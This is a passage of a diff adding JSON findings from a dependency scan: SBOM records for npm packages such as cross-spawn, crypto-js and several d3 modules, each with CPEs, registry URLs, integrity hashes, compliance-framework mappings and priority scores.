"cpe:2.3:a:coverallsapp\\/github:coverallsapp\\/github-action:master:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:coverallsapp\\/github:coverallsapp\\/github_action:master:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:github/coverallsapp/github-action@master", + "metadataType": "github-actions-use-statement", + "metadata": { + "value": "coverallsapp/github-action@master" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c42474dc158d56dd", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: cross-fetch 3.2.0", + "title": "cross-fetch 3.2.0", + "description": "Package discovered: cross-fetch 3.2.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "1ef521ded724ae55", + "name": "cross-fetch", + "version": "3.2.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:cross-fetch_project:cross-fetch:3.2.0:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/cross-fetch@3.2.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/cross-fetch/-/cross-fetch-3.2.0.tgz", + "integrity": "sha512-Q+xVJLoGOeIMXZmbUK4HYk+69cQH6LudR0Vu/pRm2YlU/hDV9CiS0gKUMaWY5f2NeUH9C1nV3bsTlCo0FsTV1Q==", + "dependencies": { + "node-fetch": "^2.7.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ab79d32b8583840a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: cross-spawn 7.0.6", + "title": "cross-spawn 7.0.6", + "description": "Package discovered: cross-spawn 7.0.6", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "043761526fd95886", + "name": "cross-spawn", + "version": "7.0.6", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:cross-spawn:cross-spawn:7.0.6:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:cross-spawn:cross_spawn:7.0.6:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:cross_spawn:cross-spawn:7.0.6:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:cross_spawn:cross_spawn:7.0.6:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:cross:cross-spawn:7.0.6:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:cross:cross_spawn:7.0.6:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/cross-spawn@7.0.6", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", + "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", + "dependencies": { + "path-key": "^3.1.0", + "shebang-command": "^2.0.0", + "which": "^2.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "8714b6edd2c6df07", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: crypto-js 4.2.0", + "title": "crypto-js 4.2.0", + "description": "Package discovered: crypto-js 4.2.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "2eb6177b3fd9fb78", + "name": "crypto-js", + "version": "4.2.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:crypto-js:crypto-js:4.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:crypto-js:crypto_js:4.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:crypto_js:crypto-js:4.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:crypto_js:crypto_js:4.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:crypto:crypto-js:4.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:crypto:crypto_js:4.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/crypto-js@4.2.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/crypto-js/-/crypto-js-4.2.0.tgz", + "integrity": "sha512-KALDyEYgpY+Rlob/iriUtjV6d5Eq+Y191A5g4UqLAi8CyGP9N1+FdVbkc1SxKc2r4YAYqG8JzO2KGL+AizD70Q==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "5c9f6165bd9afd4d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: cssesc 3.0.0", + "title": "cssesc 3.0.0", + "description": "Package discovered: cssesc 3.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "7ab312baa29fde7a", + "name": "cssesc", + "version": "3.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:cssesc:cssesc:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/cssesc@3.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/cssesc/-/cssesc-3.0.0.tgz", + "integrity": "sha512-/Tb/JcjK111nNScGob5MNtsntNM1aCNUDipB/TkwZFhyDrrE47SOx/18wF2bbjgc3ZzCSKW1T5nt5EbFoAz/Vg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "e510323d242254fb", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: csstype 3.2.3", + "title": "csstype 3.2.3", + "description": "Package discovered: csstype 3.2.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "7a5abc30c1904007", + "name": "csstype", + "version": "3.2.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:csstype:csstype:3.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/csstype@3.2.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/csstype/-/csstype-3.2.3.tgz", + "integrity": "sha512-z1HGKcYy2xA8AGQfwrn0PAy+PB7X/GSj3UVJW9qKyn43xWa+gl5nXmU4qqLMRzWVLFC8KusUX8T/0kCiOYpAIQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "bd9d3c33974e198d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: d3-array 3.2.4", + "title": "d3-array 3.2.4", + "description": "Package discovered: d3-array 3.2.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "d16a22647e62d254", + "name": "d3-array", + "version": "3.2.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:d3-array:d3-array:3.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3-array:d3_array:3.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3_array:d3-array:3.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3_array:d3_array:3.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3:d3-array:3.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3:d3_array:3.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/d3-array@3.2.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/d3-array/-/d3-array-3.2.4.tgz", + "integrity": "sha512-tdQAmyA18i4J7wprpYq8ClcxZy3SC31QMeByyCFyRt7BVHdREQZ5lpzoe5mFEYZUWe+oq8HBvk9JjpibyEV4Jg==", + "dependencies": { + "internmap": "1 - 2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "fe81bed2b7c1ca62", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: d3-color 3.1.0", + "title": "d3-color 3.1.0", + "description": "Package discovered: d3-color 3.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "633ef642a5395c1a", + "name": "d3-color", + "version": "3.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:d3-color:d3-color:3.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3-color:d3_color:3.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3_color:d3-color:3.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3_color:d3_color:3.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3:d3-color:3.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3:d3_color:3.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/d3-color@3.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/d3-color/-/d3-color-3.1.0.tgz", + "integrity": "sha512-zg/chbXyeBtMQ1LbD/WSoW2DpC3I0mpmPdW+ynRTj/x2DAWYrIY7qeZIHidozwV24m4iavr15lNwIwLxRmOxhA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d9ebb131f790b372", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: d3-ease 3.0.1", + "title": "d3-ease 3.0.1", + "description": "Package discovered: d3-ease 3.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "5c5a953bcb066b0e", + "name": "d3-ease", + "version": "3.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BSD-3-Clause", + "spdxExpression": "BSD-3-Clause", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:d3-ease:d3-ease:3.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3-ease:d3_ease:3.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3_ease:d3-ease:3.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3_ease:d3_ease:3.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3:d3-ease:3.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3:d3_ease:3.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/d3-ease@3.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/d3-ease/-/d3-ease-3.0.1.tgz", + "integrity": "sha512-wR/XK3D3XcLIZwpbvQwQ5fK+8Ykds1ip7A2Txe0yxncXSdq1L9skcG7blcedkOX+ZcgxGAmLX1FrRGbADwzi0w==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": 